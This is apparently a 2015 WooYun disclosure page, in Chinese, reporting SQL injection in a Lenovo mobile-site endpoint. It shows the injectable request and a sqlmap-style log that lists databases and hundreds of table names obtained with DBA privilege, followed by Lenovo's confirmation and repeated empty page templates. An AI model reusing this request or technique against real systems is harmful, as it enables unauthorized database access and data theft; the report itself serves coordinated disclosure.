联想某重要网站mssql注入海量数据库 | wooyun-2015-0101778| WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0101778

漏洞标题：联想某重要网站mssql注入海量数据库

漏洞作者：路人甲

提交时间：2015-03-17 09:20

修复时间：2015-05-01 10:20

公开时间：2015-05-01 10:20

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2015-03-17：细节已通知厂商并且等待厂商处理中
2015-03-17：厂商已经确认，细节仅向厂商公开
2015-03-27：细节向核心白帽子及相关领域专家公开
2015-04-06：细节向普通白帽子公开
2015-04-16：细节向实习白帽子公开
2015-05-01：细节向公众公开

简要描述：

详细说明：

漏洞证明：

m.lenovo.com.cn
Province 有注入

GET /ajax/LenovoMap.ashx?actionCode=3&Province=17&index=1&product=7&City= HTTP/1.1
User-Agent: Mozilla/5.0 
Accept-Language: en-us,en;q=0.8,en-us,en;q=0.5
X-Requested-With: XMLHttpRequest
Cache-Control: no-cache
Host: m.lenovo.com.cn
Accept-Encoding: gzip, deflate

dba权限其中lenovo_db 500多个表，有商城信息，crm等等，太多了。

available databases [10]:
[*] DBA
[*] lenovo_db
[*] lenovo_db_Jz
[*] LenovoCopy
[*] master
[*] model
[*] msdb
[*] ReportServer
[*] ReportServerTempDB
[*] tempdb

09:53:01] [INFO] fetching number of tables for database 'lenovo_db'
[09:53:01] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[09:53:01] [INFO] retrieved: 517
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2008
[09:56:58] [INFO] fetching tables for database: lenovo_db
[09:56:58] [INFO] fetching number of tables for database 'lenovo_db'
[09:56:58] [INFO] resumed: 517
[09:56:58] [INFO] retrieving the length of query output
[09:56:58] [INFO] retrieved: 10
[09:57:01] [INFO] resumed: dbo.a_add$
[09:57:01] [INFO] retrieving the length of query output
[09:57:01] [INFO] retrieved: 12
[09:57:03] [INFO] resumed: dbo.a_delete
[09:57:03] [INFO] retrieving the length of query output
[09:57:03] [INFO] retrieved: 8
[09:57:05] [INFO] resumed: dbo.a_ly
[09:57:05] [INFO] retrieving the length of query output
[09:57:05] [INFO] retrieved: 13
[09:57:07] [INFO] resumed: dbo.a_macshop
[09:57:07] [INFO] retrieving the length of query output
[09:57:07] [INFO] retrieved: 12
[09:57:10] [INFO] resumed: dbo.a_repair
[09:57:10] [INFO] retrieving the length of query output
[09:57:10] [INFO] retrieved: 11
[09:57:12] [INFO] resumed: dbo.aa_shop
[09:57:12] [INFO] retrieving the length of query output
[09:57:12] [INFO] retrieved: 19
[09:57:15] [INFO] resumed: dbo.add_sytsj130314
[09:57:15] [INFO] retrieving the length of query output
[09:57:15] [INFO] retrieved: 20
[09:57:17] [INFO] resumed: dbo.add_XF20140827lx
[09:57:17] [INFO] retrieving the length of query output
[09:57:17] [INFO] retrieved: 20
[09:57:20] [INFO] resumed: dbo.add_znjj20130708
[09:57:20] [INFO] retrieving the length of query output
[09:57:20] [INFO] retrieved: 12
[09:57:22] [INFO] resumed: dbo.awardrst
[09:57:22] [INFO] retrieving the length of query output
[09:57:22] [INFO] retrieved: 10
[09:57:25] [INFO] resumed: dbo.b2cmbr
[09:57:25] [INFO] retrieving the length of query output
[09:57:25] [INFO] retrieved: 14
[09:57:27] [INFO] resumed: dbo.b2cmbr_bak
[09:57:27] [INFO] retrieving the length of query output
[09:57:27] [INFO] retrieved: 21
[09:57:29] [INFO] resumed: dbo.bak_City_20110803
[09:57:29] [INFO] retrieving the length of query output
[09:57:29] [INFO] retrieved: 25
[09:57:32] [INFO] resuming partial value: dbo.bak_
[09:57:41] [INFO] retrieved: dbo.bak_Province_20110803     
[09:57:41] [INFO] retrieving the length of query output
[09:57:41] [INFO] retrieved: 29
[09:57:57] [INFO] retrieved: dbo.bak_ResellerInfo_20110803             
[09:57:57] [INFO] retrieving the length of query output
[09:57:57] [INFO] retrieved: 12
[09:58:09] [INFO] retrieved: dbo.bgbktdtl             
[09:58:09] [INFO] retrieving the length of query output
[09:58:09] [INFO] retrieved: 10
[09:58:17] [INFO] retrieved: dbo.bktdtl             
[09:58:17] [INFO] retrieving the length of query output
[09:58:17] [INFO] retrieved: 11
[09:58:25] [INFO] retrieved: dbo.Catalog             
[09:58:25] [INFO] retrieving the length of query output
[09:58:25] [INFO] retrieved: 16
[09:58:37] [INFO] retrieved: dbo.Catalog_1007             
[09:58:37] [INFO] retrieving the length of query output
[09:58:37] [INFO] retrieved: 26
[09:58:51] [INFO] retrieved: dbo.catalog_zhaoyan1017bak             
[09:58:51] [INFO] retrieving the length of query output
[09:58:51] [INFO] retrieved: 15
[09:59:00] [INFO] retrieved: dbo.Catalog1218             
[09:59:00] [INFO] retrieving the length of query output
[09:59:00] [INFO] retrieved: 15
[09:59:13] [INFO] retrieved: dbo.Catalog1223             
[09:59:13] [INFO] retrieving the length of query output
[09:59:13] [INFO] retrieved: 24
[09:59:26] [INFO] retrieved: dbo.CatenaManagementInfo             
[09:59:26] [INFO] retrieving the length of query output
[09:59:26] [INFO] retrieved: 28
[09:59:46] [INFO] retrieved: dbo.ChannelProductManagement             
[09:59:46] [INFO] retrieving the length of query output
[09:59:46] [INFO] retrieved: 24
[10:00:00] [INFO] retrieved: dbo.ChannelRecommendInfo             
[10:00:00] [INFO] retrieving the length of query output
[10:00:00] [INFO] retrieved: 16
[10:00:14] [INFO] retrieved: dbo.combine_shop             
[10:00:14] [INFO] retrieving the length of query output
[10:00:14] [INFO] retrieved: 17
[10:00:24] [INFO] retrieved: dbo.crm_BasicInfo             
[10:00:24] [INFO] retrieving the length of query output
[10:00:24] [INFO] retrieved: 16
[10:00:34] [INFO] retrieved: dbo.crm_SignInfo             
[10:00:34] [INFO] retrieving the length of query output
[10:00:34] [INFO] retrieved: 16
[10:00:44] [INFO] retrieved: dbo.crm_signtype             
[10:00:44] [INFO] retrieving the length of query output
[10:00:44] [INFO] retrieved: 10
[10:00:51] [INFO] retrieved: dbo.ctrmst             
[10:00:51] [INFO] retrieving the length of query output
[10:00:51] [INFO] retrieved: 10
[10:00:57] [INFO] retrieved: dbo.ctymst             
[10:00:57] [INFO] retrieving the length of query output
[10:00:57] [INFO] retrieved: 16
[10:01:08] [INFO] retrieved: dbo.dtproperties             
[10:01:08] [INFO] retrieving the length of query output
[10:01:08] [INFO] retrieved: 16
[10:01:19] [INFO] retrieved: dbo.e04_city_new             
[10:01:19] [INFO] retrieving the length of query output
[10:01:19] [INFO] retrieved: 16
[10:01:35] [INFO] retrieved: dbo.e04_province             
[10:01:35] [INFO] retrieving the length of query output
[10:01:35] [INFO] retrieved: 9
[10:01:42] [INFO] retrieved: dbo.email           
[10:01:42] [INFO] retrieving the length of query output
[10:01:42] [INFO] retrieved: 11
[10:01:50] [INFO] retrieved: dbo.fb_shop             
[10:01:50] [INFO] retrieving the length of query output
[10:01:50] [INFO] retrieved: 15
[10:02:01] [INFO] retrieved: dbo.frontSearch             
[10:02:01] [INFO] retrieving the length of query output
[10:02:01] [INFO] retrieved: 10
[10:02:08] [INFO] retrieved: dbo.gdsmst             
[10:02:08] [INFO] retrieving the length of query output
[10:02:08] [INFO] retrieved: 19
[10:02:19] [INFO] retrieved: dbo.gdsmst_20070824             
[10:02:19] [INFO] retrieving the length of query output
[10:02:19] [INFO] retrieved: 19
[10:02:30] [INFO] retrieved: dbo.gdsmst_20090823             
[10:02:30] [INFO] retrieving the length of query output
[10:02:30] [INFO] retrieved: 16
[10:02:40] [INFO] retrieved: dbo.gdsmst_child             
[10:02:40] [INFO] retrieving the length of query output
[10:02:40] [INFO] retrieved: 30
[10:02:56] [INFO] retrieved: dbo.gdsmst_memberprice20120921             
[10:02:56] [INFO] retrieving the length of query output
[10:02:56] [INFO] retrieved: 21
[10:03:09] [INFO] retrieved: dbo.gdsmst_zhaoyanbak             
[10:03:09] [INFO] retrieving the length of query output
[10:03:09] [INFO] retrieved: 14
[10:03:19] [INFO] retrieved: dbo.gdsmst1120             
[10:03:19] [INFO] retrieving the length of query output
[10:03:19] [INFO] retrieved: 14
[10:03:28] [INFO] retrieved: dbo.gdsmst1223             
[10:03:28] [INFO] retrieving the length of query output
[10:03:28] [INFO] retrieved: 14
[10:03:37] [INFO] retrieved: dbo.GdsPackage             
[10:03:37] [INFO] retrieving the length of query output
[10:03:37] [INFO] retrieved: 13
[10:03:46] [INFO] retrieved: dbo.gdspromot             
[10:03:46] [INFO] retrieving the length of query output
[10:03:46] [INFO] retrieved: 10
[10:03:54] [INFO] retrieved: dbo.gdspst             
[10:03:54] [INFO] retrieving the length of query output
[10:03:54] [INFO] retrieved: 13
[10:04:04] [INFO] retrieved: dbo.gdspsttmp             
[10:04:04] [INFO] retrieving the length of query output
[10:04:04] [INFO] retrieved: 10
[10:04:11] [INFO] retrieved: dbo.gdswil             
[10:04:11] [INFO] retrieving the length of query output
[10:04:11] [INFO] retrieved: 15
[10:04:20] [INFO] retrieved: dbo.GetNewsYear             
[10:04:20] [INFO] retrieving the length of query output
[10:04:20] [INFO] retrieved: 11
[10:04:29] [INFO] retrieved: dbo.helpmst             
[10:04:29] [INFO] retrieving the length of query output
[10:04:29] [INFO] retrieved: 16
[10:04:41] [INFO] retrieved: dbo.helpmst_code             
[10:04:41] [INFO] retrieving the length of query output
[10:04:41] [INFO] retrieved: 19
[10:04:52] [INFO] retrieved: dbo.helpmst_code_fq             
[10:04:52] [INFO] retrieving the length of query output
[10:04:52] [INFO] retrieved: 14
[10:05:01] [INFO] retrieved: dbo.helpmst_fq             
[10:05:01] [INFO] retrieving the length of query output
[10:05:01] [INFO] retrieved: 22
[10:05:15] [INFO] retrieved: dbo.HotSaleProductList             
[10:05:15] [INFO] retrieving the length of query output
[10:05:15] [INFO] retrieved: 22
[10:05:29] [INFO] retrieved: dbo.InsertZNTV20121127             
[10:05:29] [INFO] retrieving the length of query output
[10:05:29] [INFO] retrieved: 46
[10:05:52] [INFO] retrieved: dbo.Lenovo_GoogleMap_DirectStore_A_ProductType             
[10:05:52] [INFO] retrieving the length of query output
[10:05:52] [INFO] retrieved: 36
[10:06:17] [INFO] retrieved: dbo.Lenovo_GoogleMap_DirectStoreInfo             
[10:06:17] [INFO] retrieving the length of query output
[10:06:17] [INFO] retrieved: 41
。。。。。。。。。。。。
。。。。。。。。。。。。。。

修复方案：

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

危害等级：高

漏洞Rank：12

确认时间：2015-03-17 10:18

厂商回复：

谢谢您对联想安全工作的支持,我们会尽快修复漏洞

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0101778

漏洞标题：联想某重要网站mssql注入海量数据库

相关厂商：联想

漏洞作者：路人甲

提交时间：2015-03-17 09:20

修复时间：2015-05-01 10:20

公开时间：2015-05-01 10:20

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0101778

漏洞标题：联想某重要网站mssql注入海量数据库

相关厂商：联想

漏洞作者： 路人甲

提交时间：2015-03-17 09:20

修复时间：2015-05-01 10:20

公开时间：2015-05-01 10:20

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：厂商已经确认

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2015-0101778"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 路人甲@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞概要关注数(24) 关注此漏洞

漏洞作者：路人甲

Tags标签：无

4人收藏收藏
分享漏洞：

版权声明：转载请注明来源路人甲@乌云